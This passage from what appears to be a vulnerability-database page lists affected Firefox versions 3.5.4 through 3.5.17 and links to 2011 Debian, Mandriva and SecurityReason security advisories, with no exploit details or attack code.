Mozilla>>Firefox >> Version 3.5.4

Mozilla>>Firefox >> Version 3.5.5

Mozilla>>Firefox >> Version 3.5.6

Mozilla>>Firefox >> Version 3.5.7

Mozilla>>Firefox >> Version 3.5.8

Mozilla>>Firefox >> Version 3.5.9

Mozilla>>Firefox >> Version 3.5.10

Mozilla>>Firefox >> Version 3.5.11

Mozilla>>Firefox >> Version 3.5.12

Mozilla>>Firefox >> Version 3.5.13

Mozilla>>Firefox >> Version 3.5.14

Mozilla>>Firefox >> Version 3.5.15

Mozilla>>Firefox >> Version 3.5.16

Mozilla>>Firefox >> Version 3.5.17

Références

http://www.debian.org/security/2011/dsa-2228
Tags : vendor-advisory, x_refsource_DEBIAN
http://securityreason.com/securityalert/8340
Tags : third-party-advisory, x_refsource_SREASON
http://www.mandriva.com/security/advisories?name=MDVSA-2011:079
Tags : vendor-advisory, x_refsource_MANDRIVA
http://securityreason.com/securityalert/8331
Tags : third-party-advisory, x_refsource_SREASON
http://www.debian.org/security/2011/dsa-2235
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.debian.org/security/2011/dsa-2227
Tags : vendor-advisory, x_refsource_DEBIAN
http://securityreason.com/securityalert/8326
Tags : third-party-advisory, x_refsource_SREASON